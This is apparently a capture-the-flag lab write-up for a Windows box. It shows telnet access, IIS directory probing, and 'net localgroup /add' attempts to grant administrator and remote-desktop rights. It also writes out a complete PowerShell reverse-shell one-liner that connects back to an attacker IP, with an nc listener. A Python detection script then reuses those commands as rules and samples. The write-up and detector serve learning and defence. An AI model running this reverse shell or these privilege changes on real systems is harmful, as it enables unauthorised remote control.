Access (port 23: telnet login, reverse cmd shell)

```
Administrator
The command completed successfully.
```

```
net localgroup Administrators security /add
```
Tried adding this user to the Administrators group; it failed.

```
net localgroup "Remote Desktop Users"
net localgroup "Remote Desktop Users" security /add
```
Tried adding it to the Remote Desktop Users group.
## Attempt 1
Found a directory under the web path; neither the browser nor telnet had permission to access it. So I googled it.

```
C:\inetpub>cd wwwroot

C:\inetpub\wwwroot>dir
 Volume in drive C has no label.
 Volume Serial Number is 9C45-DBF0

 Directory of C:\inetpub\wwwroot

08/24/2018  07:39 PM    <DIR>          .
08/24/2018  07:39 PM    <DIR>          ..
08/21/2018  10:30 PM    <DIR>          aspnet_client
08/23/2018  11:33 PM               391 index.html
08/24/2018  07:39 PM            88,712 out.jpg
               2 File(s)         89,103 bytes
               3 Dir(s)  16,623,439,872 bytes free

cd aspnet_client
```

```
http://10.10.10.98/aspnet_client/system_web/

403 - Forbidden: Access is denied.
You do not have permission to view this directory or page using the credentials that you supplied.
```

IIS 7.5 source code disclosure / authentication bypass
https://blog.alertlogic.com/blog/internet-information-server-(iis)-exploitation/

## Attempt 2: PowerShell reverse shell

```
nc -lnvp 6688

copy con whale.ps1

$client = New-Object System.Net.Sockets.TCPClient('10.10.14.17',6688);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Yes

type whale.ps1
```
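As an added example (not part of the original write-up), a small Python triage script that flags the two patterns seen in this section in process-creation or script-block command lines: the PowerShell `TCPClient` + `iex` reverse shell, and `net localgroup ... /add` membership changes. The rule names, the event fields and the sample events are constructed for the example.

```python
import re

# Two detection rules derived from the commands in the write-up above.
# Each rule is a list of regexes that must ALL match the command line.
RULES = {
    # PowerShell opening a raw TCP socket and feeding what it receives to iex:
    # the hallmark of the one-liner written to whale.ps1.
    "powershell_tcp_reverse_shell": [
        r"System\.Net\.Sockets\.TCPClient",
        r"\b(iex|Invoke-Expression)\b",
    ],
    # Membership change on a local group via net.exe / net1.exe, as in the
    # attempts to join Administrators and Remote Desktop Users.
    "local_group_member_added": [
        r"\bnet1?\s+localgroup\s+",
        r"\s/add\b",
    ],
}


def match_rules(cmdline):
    """Return the names of all rules whose regexes all match cmdline."""
    return [name for name, pats in RULES.items()
            if all(re.search(p, cmdline, re.IGNORECASE) for p in pats)]


def triage(events):
    """events: list of dicts with 'host' and 'cmdline'; returns flagged copies."""
    flagged = []
    for ev in events:
        hits = match_rules(ev["cmdline"])
        if hits:
            flagged.append({**ev, "rules": hits})
    return flagged


# Constructed sample events (not real telemetry) mimicking command lines
# from the host in the write-up.
SAMPLE_EVENTS = [
    {"host": "ACCESS", "cmdline": "powershell -c \"$client = New-Object System.Net.Sockets.TCPClient('10.10.14.17',6688);$stream = $client.GetStream();$sendback = (iex $data 2>&1 | Out-String)\""},
    {"host": "ACCESS", "cmdline": "net localgroup Administrators security /add"},
    {"host": "ACCESS", "cmdline": "net localgroup \"Remote Desktop Users\" security /add"},
    {"host": "ACCESS", "cmdline": "powershell -c Get-Process | Out-String"},
    {"host": "ACCESS", "cmdline": "net localgroup \"Remote Desktop Users\""},
]

if __name__ == "__main__":
    for ev in triage(SAMPLE_EVENTS):
        print(f"{ev['host']}: {ev['rules']} <- {ev['cmdline'][:60]}")
```

Only the first three constructed events are flagged; listing a group without `/add` and an ordinary PowerShell pipeline pass through untouched.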

## Summary

Next time I'll study how to escalate privileges on Windows manually without msf. I have done relatively little Windows privilege escalation.